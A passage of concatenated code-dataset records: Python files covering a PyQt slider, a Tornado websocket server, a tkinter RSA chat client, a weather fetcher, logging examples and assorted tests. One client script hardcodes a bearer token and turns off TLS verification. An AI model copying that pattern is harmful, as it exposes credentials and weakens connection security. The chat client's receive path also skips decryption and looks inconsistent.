Can\t7.7\t7.557097\n281\tAmerican Gangster\t7.4\t7.141396\n4041\tThis Is England\t7.4\t6.739664\n1149\tAmerican Hustle\t6.8\t6.717525\n1243\tMean Streets\t7.2\t6.626569\n2839\tRounders\t6.9\t6.530427\n'''\n\n","sub_path":"contents_filter_test.py","file_name":"contents_filter_test.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479226151","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QSlider, QLabel\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtGui\n\n\ndef debugging_slider():\n mydebug = DebbugingSlider()\n \n\nclass DebbugingSlider(QtWidgets.QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(DebbugingSlider, self).__init__(*args, **kwargs)\n\n self.name_value_dict = {}\n self.label_keys = []\n self.name_range = 4\n self.idx = 0\n \"\"\"\n if( custom_name_list ):\n self.name_range = len(custom_name_list)\n for name in custom_name_list:\n self.label_keys.append(name)\n else :\n \"\"\"\n self.label_keys = [\" Encoder Rotation Scalar \",\n \" BPM \",\n \"OTHER3\",\"OTHER4\",\"OTHER5\",\"OTHER6\",\"OTHER7\",\"OTHER8\"]\n #app = QApplication(sys.argv)\n #window = QWidget()\n vbox = QVBoxLayout()\n\n self.make_slider( self , vbox )\n self.setLayout(vbox)\n self.setGeometry(50,50,320,200)\n self.setWindowTitle(\"Parameter tuning\")\n #window.show()\n #sys.exit(app.exec_())\n\n def get_value( self, key_name ):\n \"\"\"Get Slider Value Helper function\"\"\"\n return self.name_value_dict[ key_name ]\n\n def change_value( self, widget_dict ):\n \"\"\"Slot function.\"\"\"\n widget_dict[\"value_label\"].setText(str(widget_dict[\"slider\"].value()))\n self.name_value_dict[ widget_dict[\"name_label\"] ] = widget_dict[\"slider\"].value()\n\n def make_slider( self, win , vbox , count = 1 ):\n \"\"\"Slider + text constructor.\"\"\"\n start_val = 0\n # make text display\n name_label = QLabel( self.label_keys[self.idx])\n value_label = QLabel(str(start_val))\n value_label.setFont(QtGui.QFont(\"Sanserif\", 15))\n value_label.setFont(QtGui.QFont(\"Sanserif\", 15))\n vbox.setAlignment(Qt.AlignCenter)\n\n # make slider\n mySlider = QSlider(Qt.Horizontal,win)\n mySlider.setTickPosition(QSlider.TicksBelow)\n mySlider.setTickInterval( 1 )\n mySlider.setMinimum(0)\n mySlider.setMaximum(10)\n mySlider.setOrientation(Qt.Horizontal)\n\n # add widgets\n vbox.addWidget(name_label)\n vbox.addWidget(value_label)\n vbox.addWidget(mySlider)\n\n # object retrieval\n self.name_value_dict[ self.label_keys[self.idx] ] = start_val\n widget_dict = {\"slider\" :mySlider , \"value_label\":value_label ,\"name_label\":name_label}\n mySlider.valueChanged[int].connect( lambda: self.change_value(widget_dict) )\n self.idx += 1 \n\n\nif __name__ == '__main__':\n DebbugingSlider()\n\n\n\n\n","sub_path":"software/control_system/gui/slider.py","file_name":"slider.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639886340","text":"import json\n#from json2html import json2html\nimport requests\n\nAPI_KEY = 'eyJhbGciOiJIUzUxMiIsImlhdCI6MTU0NDA5ODM0MCwiZXhwIjoxNTc1NjM0MzQwfQ.eyJ1c2VybmFtZSI6ImRvc2llIn0.MTOjvlD5QRRk1ZRp9zzT0G0_G6KJqAsl8dnnJU38_Qn99ufFe92Bsz89iYudYtZzGUib_QMKnTV3QNa7Sahsyg'\nBASE_URL = 'https://localhost:5002/absapi/v1/'\n\ndef getffullcusinfo():\n url = BASE_URL+'cus/222512'\n headers = {\"Authorization\": \"Bearer %s\" % API_KEY,\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\",\n }\n\n try:\n res = requests.get(url, headers=headers, verify=False)\n data = res.json()\n\n print(json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False))\n print(json.dumps(data))\n print(data)\n # print(json2html.convert(json=data))\n\n except Exception as e:\n print(\"Exception (getfromapi):\", e)\n pass\n\n return data\n\ngetffullcusinfo()","sub_path":"test/test_cus.py","file_name":"test_cus.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317738644","text":"\"\"\"The solution in this case is about using list comprehensions to make the code\nmore efficient and simple\"\"\"\n\n\nX = int(input(\"What is the maximal length of the triangle side? Enter a number: \"))\n\nsolutions = [[x, y, z] for x in range(5, X) for y in range(4, X) for z in range(3, X) if (x*x==y*y+z*z)]\n\nmaximum = 0\nmaximum = max([max(solution) for solution in solutions if maximum < max(solution)])\n\nprint(f\"The longest side possible is {maximum}\")","sub_path":"your-code/challenge-3.py","file_name":"challenge-3.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62182026","text":"import sys\nimport time\nimport traceback\n\nimport tornado\nimport tornado.web\nimport tornado.ioloop\nimport tornado.websocket\nfrom tornado import gen\n\nfrom webalchemy.remotedocument import remotedocument\nfrom webalchemy.utils import log\n\n\n\n\nmain_html='''\n\n\n\n\n\n \n'''\n\n \n\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def initialize(self, port):\n log('Initiallizing new app!')\n self.main_html= main_html.replace('PORT',str(port)) \n @gen.coroutine\n def get(self):\n self.write(self.main_html)\n \n\n\n\nclass WebSocketHandler(tornado.websocket.WebSocketHandler):\n @gen.coroutine\n def initialize(self, local_doc, shared_wshandlers):\n log('Initiallizing new documet!')\n self.remotedocument= remotedocument()\n self.sharedhandlers= shared_wshandlers\n self.local_doc= local_doc()\n self.local_doc_initialized= False\n self.sharedhandlers.append(self)\n\n @gen.coroutine\n def open(self):\n log('WebSocket opened')\n\n @gen.coroutine\n def on_message(self, message):\n log('message received:\\n'+message)\n try:\n if not self.local_doc_initialized:\n log('Initializing local document with message...')\n yield self.local_doc.initialize(self.remotedocument,self, message)\n self.local_doc_initialized= True\n else:\n log('passing message to document...')\n yield self.local_doc.inmessage(message)\n yield self.flush_dom()\n except:\n log('Failed handling message. Exception:')\n traceback.print_exc(file=sys.stdout)\n sys.stdout.flush() \n @gen.coroutine\n def flush_dom(self):\n code= self.remotedocument.pop_all_code()\n if code!='':\n log('sending message:\\n'+code)\n # this is good to simulate latency\n #yield async_delay(2)\n self.write_message(code)\n else:\n log('**NOTHING**')\n @gen.coroutine\n def msg_in_proc(self,msg,send_to_self=False):\n log('sending message to all '+str(len(self.sharedhandlers))+' documents in process:')\n log(msg)\n for h in self.sharedhandlers:\n if h.local_doc is not self.local_doc or send_to_self:\n try:\n yield h.local_doc.outmessage(msg,self.local_doc)\n yield h.flush_dom()\n except:\n log('Failed handling outmessage. Exception:')\n traceback.print_exc(file=sys.stdout)\n sys.stdout.flush()\n @gen.coroutine\n def on_close(self):\n log('WebSocket closed')\n log('Removing shared doc')\n self.sharedhandlers.remove(self)\n log('Calling local document on_close:')\n try:\n yield self.local_doc.onclose()\n except:\n log('Failed handling local document onclose. Exception:')\n traceback.print_exc(file=sys.stdout)\n sys.stdout.flush()\n\n\n\n\n@gen.coroutine\ndef async_delay(secs):\n yield gen.Task(tornado.ioloop.IOLoop.instance().add_timeout, time.time() + secs)\n\n\n\n\ndef run(port,local_doc):\n shared_wshandlers= []\n application = tornado.web.Application([\n (r'/', MainHandler, dict(port=port)),\n (r'/websocket', WebSocketHandler, dict(local_doc=local_doc, shared_wshandlers=shared_wshandlers)),\n ])\n application.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n ","sub_path":"webalchemy/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21799803","text":"# -*- coding:utf-8 -*-\n# @Desc : \n# @Author : Administrator\n# @Date : 2019-07-31 16:02\n\nimport logging\n\n# 日志级别等级:critical > error > warning > info > debug > notset\n# 默认的日志级别:warning\n# 默认的日志格式:日志级别、日志输出方式、\n\n# 设置日志信息及格式\n# logging.basicConfig(\n# # 设置日志级别\n# level = logging.DEBUG,\n# # 设置日志输出方式[文件方式、控制台方式]\n# filename = \"logger.log\", # 文件方式,默认是追加的方式\n# # 设置文件日志的打开方式[w:覆盖]\n# filemode = \"w\",\n# # 设置日志的信息格式化样式\n# format = \"%(asctime)s [%(lineno)d] %(message)s\"\n#\n# )\n#\n# logging.debug(\"debug message\")\n# logging.info(\"info message\")\n# logging.warning(\"warning message\")\n# logging.error(\"error message\")\n# logging.critical(\"critical message\")\n\n### 使用logger对象,把日志信息即输出到控制台又输出到文件\nlogger = logging.getLogger()\n\n# 设置向文件和控制台输出信息\nfh = logging.FileHandler(\"logger.log\")\nch = logging.StreamHandler()\n\n# 设置定义日志输出格式\nfm = logging.Formatter(\"%(asctime)s %(message)s\")\n\nfh.setFormatter(fm)\nch.setFormatter(fm)\n\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n# 设置logger日志的输出级别\nlogger.setLevel(\"DEBUG\")\n\nlogger.debug(\"logger debug message\")\nlogger.info(\"logger info message\")\nlogger.warning(\"logger warning message\")\nlogger.error(\"logger error message\")\nlogger.critical(\"logger critical message\")\n\n\n","sub_path":"[06]Python-内置函数与模块/Python内置模块部分/07内置模块-logging.py","file_name":"07内置模块-logging.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582134993","text":"import pytest\n\nfrom utils.process import run, silent_run, RunError\nfrom utils.fs import in_temp_dir\n\n\ndef test_run(capsys):\n with in_temp_dir():\n assert run('echo hello > hello.txt; echo world >> hello.txt', shell=True)\n\n out = run('ls', return_output=True)\n assert out == 'hello.txt\\n'\n\n out = run(['cat', 'hello.txt'], return_output=True)\n assert out == 'hello\\nworld\\n'\n\n with pytest.raises(RunError):\n run('blah')\n\n assert not run('blah', raises=False)\n\n assert silent_run('ls -l')\n out, _ = capsys.readouterr()\n assert out == ''\n","sub_path":"tests/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224538971","text":"import threading\nimport time\nimport tkinter.filedialog\nfrom tkinter import *\nimport tkinter.messagebox\nfrom PIL import Image, ImageTk\nimport cilent_recv_file\nimport file_client\nimport session\nimport rsa\n\n\nclass chat():\n def send_friend(self):\n message = self.textpad.get(1.0, END)\n self.textpad.delete(1.0, END)#清空发送窗口\n\n #把自己发送的消息以红色时间显示\n\n self.show_message.tag_config('red', background='red')\n\n self.show_message.config(state=NORMAL)\n self.show_message.insert(self.mark, self.my_name + ' ', 'red')\n self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'red')\n self.show_message.insert(self.mark, message + '\\n\\n')\n self.show_message.config(state=DISABLED)\n\n try:\n #使用公钥加密,只能对字节类性加密\n message = str(session.FRIEND_ID) + ':' + message\n crypto = rsa.encrypt(message.encode('utf-8'), session.pubkey)\n session.chat_tcpCliSock.send(crypto)\n except EXCEPTION as e:\n print(e)\n tkinter.messagebox.showerror('错误', '发送消息失败')\n\n def receive_message(self):\n while True:\n try:\n message = session.chat_tcpCliSock.recv(1024)# 接收到的是密文\n #message = rsa.decrypt(crypto, session.privatekey)# byte类型\n print(message.decode('utf-8').split('-')[0])\n print(message.decode('utf-8').split('-')[-1])\n\n if not message:\n break\n\n # elif message.decode('utf-8').split('/')[0] == 'emoji:..':#接收到图片\n # file = message.decode('utf-8').split('-')[-1]#文件路径\n # print(file)\n\n elif message.decode('utf-8').split('-')[0] == 'emoji':\n file = message.decode('utf-8').split('-')[-1]\n try:\n self.show_message.config(state=NORMAL)\n #self.textpad.tag_config(self.time_color_green, background='green')\n self.show_message.tag_config('green', background='green')\n self.show_message.insert(self.mark, self.friend_name + ' ', 'green')\n self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'green')\n _emoji = ImageTk.PhotoImage(Image.open(file))\n self.show_message.image_create(self.mark, image=_emoji)\n self.show_message.insert(self.mark, '\\n\\n', 'time_color')\n self.show_message.config(state=DISABLED)\n except Exception as e:\n print(e)\n print('显示表情出错')\n\n\n else: # 接收到了消息,在这里进行处理,显示\n print(message.decode('utf-8'))\n self.show_message.config(state=NORMAL)\n self.show_message.tag_config('green', background='green')\n self.show_message.insert(self.mark, self.friend_name + ' ', 'green')\n self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'green')\n self.show_message.insert(self.mark, message.decode('utf-8') + '\\n\\n')\n\n self.show_message.config(state=DISABLED)\n\n except:\n print('与服务器的连接已断开')\n time.sleep(3)\n break\n\n\n def send_file(self):\n try:\n filename = tkinter.filedialog.askopenfile() # defaultextension='.txt'\n # file_name = os.path.basename(file_path)\n print(filename.name)\n\n\n file_client.send_file(filename.name, session.file_tcpCliSock)\n self.show_message.insert(self.mark, self.my_name + ' ')\n self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'time_color_red')\n self.show_message.insert(self.mark, \"\\\"\" + str(filename.name) + \"\\\"\" + '文件已成功发送')\n except:\n pass\n\n\n def receive_file(self):\n if cilent_recv_file.recv():#返回值为文件名\n self.show_message.insert(self.mark, \"接收到文件:\" + str(cilent_recv_file.recv()))\n\n def emoji(self):\n #取得当前光标位置,插入图片\n #这条语句可以实现插入图片,但是不能得到current\n #button = Button(top, image=photo1, command=lambda :print(self.textpad.image_create('mark', image=photo1)))\n\n top = Toplevel()\n\n def send_emoji(photo):\n #构造发送语句\n text = 'emoji-' + photo\n try:\n text = rsa.encrypt((session.FRIEND_ID + ':' + text).encode('utf-8'), session.pubkey)\n session.chat_tcpCliSock.send(text)\n except:\n print('表情发送失败')\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a1.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a1.png'))\n button.image = photo\n button.grid(row=0, column=1)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a2.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a2.png'))\n button.image = photo\n button.grid(row=0, column=2)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a3.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a3.png'))\n button.image = photo\n button.grid(row=0, column=3)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a4.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a4.png'))\n button.image = photo\n button.grid(row=0, column=4)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a5.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a5.png'))\n button.image = photo\n button.grid(row=0, column=5)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a6.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a6.png'))\n button.image = photo\n button.grid(row=0, column=6)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a7.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a7.png'))\n button.image = photo\n button.grid(row=0, column=7)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a8.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a8.png'))\n button.image = photo\n button.grid(row=0, column=8)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a9.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a9.png'))\n button.image = photo\n button.grid(row=0, column=9)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a10.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a10.png'))\n button.image = photo\n button.grid(row=0, column=10)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a11.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a11.png'))\n button.image = photo\n button.grid(row=0, column=11)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'a12.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'a12.png'))\n button.image = photo\n button.grid(row=0, column=12)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b1.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b1.png'))\n button.image = photo\n button.grid(row=1, column=1)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b2.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b2.png'))\n button.image = photo\n button.grid(row=1, column=2)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b3.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b3.png'))\n button.image = photo\n button.grid(row=1, column=3)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b4.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b4.png'))\n button.image = photo\n button.grid(row=1, column=4)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b5.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b5.png'))\n button.image = photo\n button.grid(row=1, column=5)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b6.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b6.png'))\n button.image = photo\n button.grid(row=1, column=6)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b7.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b7.png'))\n button.image = photo\n button.grid(row=1, column=7)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b8.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b8.png'))\n button.image = photo\n button.grid(row=1, column=8)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b9.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b9.png'))\n button.image = photo\n button.grid(row=1, column=9)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b10.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b10.png'))\n button.image = photo\n button.grid(row=1, column=10)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b11.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b11.png'))\n button.image = photo\n button.grid(row=1, column=11)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'b12.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'b12.png'))\n button.image = photo\n button.grid(row=1, column=12)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c1.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c1.png'))\n button.image = photo\n button.grid(row=2, column=1)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c2.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c2.png'))\n button.image = photo\n button.grid(row=2, column=2)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c3.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c3.png'))\n button.image = photo\n button.grid(row=2, column=3)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c4.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c4.png'))\n button.image = photo\n button.grid(row=2, column=4)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c5.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c5.png'))\n button.image = photo\n button.grid(row=2, column=5)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c6.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c6.png'))\n button.image = photo\n button.grid(row=2, column=6)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c7.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c7.png'))\n button.image = photo\n button.grid(row=2, column=7)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c8.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c8.png'))\n button.image = photo\n button.grid(row=2, column=8)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c9.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c9.png'))\n button.image = photo\n button.grid(row=2, column=9)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c10.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c10.png'))\n button.image = photo\n button.grid(row=2, column=10)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c11.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c11.png'))\n button.image = photo\n button.grid(row=2, column=11)\n\n photo = ImageTk.PhotoImage(Image.open(self.rootdir + 'c12.png'))\n button = Button(top, image=photo, command=lambda: send_emoji(self.rootdir + 'c12.png'))\n button.image = photo\n button.grid(row=2, column=12)\n\n top.mainloop()\n\n\n def __init__(self):\n #self.rootdir ='e:/python/chatroomforgit/emoji_file/'\n self.friend_name = session.FRIEND_NAME\n self.my_name = session.USER_NAME\n\n self.rootdir = '../emoji_file/'\n self.time_color_green = 'time_color_green'\n self.time_color_red = 'time_color_red'\n\n\n # 向服务器发送第一条消息,使用格式userid:friendid\n # userid_friendid = session.USER_ID + ':' + session.FRIEND_ID\n # try:\n # session.chat_tcpCliSock.send(userid_friendid.encode('utf-8'))\n # session.file_tcpCliSock.send(userid_friendid.encode('utf-8'))\n # except Exception as e:\n # print(e)\n # print('发送好友名称出错')\n\n # 创建接受消息线程\n self.thread_receive = threading.Thread(target=self.receive_message, args=(), name=session.FRIEND_NAME)\n self.thread_receive.start()\n\n self.root = Toplevel()\n self.root.geometry('600x450+450+250')\n self.root.title(session.FRIEND_NAME)\n\n # 上方——好友信息\n self.label_info = Label(self.root, text='个人信息', relief=SUNKEN, anchor=W, bd=1) # W是West对齐,即左对齐;bd是border\n self.label_info.pack(side=TOP, fill=X, ipady=20)\n\n # 中部——聊天信息框\n self.frame = Frame(self.root, bg='green')\n self.frame.pack(side=TOP, fill=X, ipady=50)\n\n self.show_message = Text(self.frame, bd=1, height=10)\n # self.show_message.config(state=DISABLED)#这行在添加之后在写\n self.show_message.pack(fill=BOTH, expand=1)\n self.mark = 'mark'\n self.show_message.mark_set(self.mark, CURRENT + ' lineend')\n\n # 下部——输入框部分\n self.frame_buttom = Frame(self.root, bg='black')\n self.frame_buttom.pack(side=BOTTOM, fill=BOTH, ipady=30)\n\n # 表情——文件栏\n self.lable_function = Label(self.frame_buttom, bd=1, bg='yellow')\n self.lable_function.pack(side=TOP, ipady=5, fill=BOTH)\n\n # 输入框\n self.textpad = Text(self.frame_buttom, bd=1)\n self.textpad.pack(side=TOP, fill=X, ipady=25)\n self.textpad.focus_set()\n\n #mark,tag\n self.textpad.mark_set('mark', CURRENT)\n\n\n # 添加表情、文件、发送按钮\n self.button_emoji = Button(self.lable_function, text='表情', bd=1, bg='red', command=self.emoji)\n # self.button_emoji.grid(row=0, column=1)\n self.button_emoji.pack(side=LEFT, fill=Y)\n\n self.button_file = Button(self.lable_function, text='文件', bd=1, bg='white', command=self.send_file)\n # self.button_file.grid(row=0, column=2)\n self.button_file.pack(side=LEFT, fill=Y)\n\n self.button_send = Button(self.lable_function, text='发送', bd=1, bg='blue', command=self.send_friend)\n # self.button_send.grid(row=0, column=3, sticky='E')\n self.button_send.pack(side=RIGHT, fill=Y)\n\n # #发送标签,有时间再调整吧\n # self.lable_send = Label(self.frame_buttom, bg='black', bd=1)\n # self.lable_send.pack(side=BOTTOM, fill=BOTH, ipady=5)\n\n\n\n self.root.mainloop()\n","sub_path":"GUI/chat_window.py","file_name":"chat_window.py","file_ext":"py","file_size_in_byte":16688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206097357","text":"# weather info source: openweathermap\n# tutorial: https://openweathermap.org/forecast5\n# sample json fetch:\n# http://api.openweathermap.org/data/2.5/forecast?appid=AAAAAAAAAAAAAAA&q=London&units=metric\n\nfrom datetime import datetime\nimport json\nimport random\n\nimport aiohttp\nfrom nonebot import get_bot\n\nfrom utils_bot.typing import Union\n\n# 'weather' for current weather instead\nURL_BASE: str = 'http://api.openweathermap.org/data/2.5/forecast?appid='\n# +\nAPI_KEY: str = get_bot().config.OPENWEATHERMAP_API_KEY\n# +\nURL_MODE: str = '&units=metric&cnt=25&q='\n# +\n#city\n\n# fetch weather json data\nasync def fetch(*city: str) -> dict:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n async with aiohttp.ClientSession() as session:\n try:\n async with session.get(\n f'{URL_BASE}{API_KEY}{URL_MODE}{city[0]}',\n headers=headers, timeout=10, ssl=False) as r:\n res = json.loads(await r.text())\n status = res['cod'].lower()\n assert status == '200' or status == '404'\n return res\n except BaseException:\n return None\n\n# yields weather data\ndef process_weatherdata(resJson: Union[dict, None]) -> str:\n if resJson is None:\n return 'Temperature data unavailable'\n if not 'list' in resJson.keys():\n return '也许地址有误?'+\\\n ('','如果这地址是对的,私聊我订正BUG��')[random.choice([0,0,1])]\n\n # location data\n cityChart: dict = resJson['city']\n nation = cityChart['country']\n city = cityChart['name'].upper()\n timezone = cityChart['timezone']\n reportTime = datetime.utcfromtimestamp(\n resJson['list'][0]['dt']).strftime('%Y-%m-%d %H:%M:%S')\n\n heading = f'''[below times are UTC]\nregion: {city}, {nation}, time diff from UTC: {timezone/60/60}h\n report time: {reportTime}\\n'''\n\n def resGen():\n try:\n for j in range(0, 25, 4):\n directChart: dict = resJson['list'][j]\n mainChart = directChart['main']\n weatherChart = directChart['weather'][0]\n windChart = directChart['wind']\n # if tempMin and tempMax are same, only display one temp\n tempMin, tempMax = mainChart['temp_min'], mainChart['temp_max']\n temp = (f'{tempMin}-{tempMax}°C', f'{tempMin}°C')[tempMin == tempMax]\n yield \\\nf'''{directChart['dt_txt'][:16]}: {weatherChart['main']} ({weatherChart['description']}), {temp}\n wind: {windChart['speed']}m/s ({windChart['deg']}°), humidity: {mainChart['humidity']}, pressure: {mainChart['pressure']}hPa'''\n except (IndexError, KeyError):\n pass\n return heading + '\\n'.join(resGen())\n\nasync def openweathermap_weather(*city: str):\n return process_weatherdata(await fetch(*city))\n","sub_path":"plugins/weather/data_source_openweather.py","file_name":"data_source_openweather.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"75883825","text":"import pytest\n\nimport pandas as pd\n\nfrom numpy import uint8, logical_and\n\nfrom ebs.imports import StringIO\n\nfrom go_overlap.compute_set_overlaps.set_overlaps import _compute_go_intersections\n\ndef test_compute_go_intersections(input_gene_list_vector, gene_list_bool_array,\n expected_result):\n\n actual_result = _compute_go_intersections([input_gene_list_vector,\n gene_list_bool_array])\n print(actual_result, type(actual_result))\n print(expected_result, type(expected_result))\n assert actual_result.equals(expected_result)\n\n\n@pytest.fixture\ndef input_gene_list_vector():\n s = pd.Series([1, 0, 0, 1])\n s.name = \"a\"\n return s\n\n\n@pytest.fixture\ndef gene_list_bool_array():\n return pd.read_table(StringIO(\"\"\"GO:0003674 GO:0005739 GO:0005743\n1 0 0\n1 1 1\n0 1 1\n1 1 0\"\"\"), sep=\"\\s+\", dtype=uint8, header=0)\n\n\n@pytest.fixture\ndef expected_result():\n return pd.read_table(StringIO(\"\"\"go_root a_I_go\nGO:0003674 2\nGO:0005739 1\nGO:0005743 0\"\"\"), sep=\"\\s+\", header=0, squeeze=True, index_col=0)\n","sub_path":"tests/test_gene_list_overlap/test_compute_gene_list_overlaps.py","file_name":"test_compute_gene_list_overlaps.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451742920","text":"#\n# hint_mindex.py\n#\n# Copyright © 2014 Monotype Imaging Inc. All Rights Reserved.\n#\n\n\"\"\"\nSupport for the MINDEX opcode.\n\"\"\"\n\n# Other imports\nfrom fontio3.hints.history import historygroup\nfrom fontio3.hints.common import doNotProceedPC\nfrom fontio3.triple.collection import Collection\n\n# -----------------------------------------------------------------------------\n\n#\n# Functions\n#\n\ndef hint_MINDEX(self, **kwArgs):\n \"\"\"\n MINDEX: Move indexed stack element, opcode 0x26\n \n >>> logger = utilities.makeDoctestLogger(\"MINDEX_test\")\n >>> _popSync, _testingState = _testFuncs()\n >>> h = _testingState(1, 2, -1, 3)\n >>> hint_MINDEX(h, logger=logger)\n >>> h.state.stack\n [2, -1, 1]\n >>> pp.PP().sequence_deep_tag_smart(\n ... h.state.pushHistory,\n ... (lambda x: False))\n 0: Extra index 1 in PUSH opcode index 0 in test\n 1: Extra index 2 in PUSH opcode index 0 in test\n 2: Extra index 0 in PUSH opcode index 0 in test\n >>> h = _testingState(10, toCollection([20, 30]), 40, toCollection([2, 3]))\n >>> hint_MINDEX(h, logger=logger)\n >>> h.state.stack[-1]\n Ranges: [(10, 40, 10)]\n >>> h.state.stack[-2]\n 40\n >>> 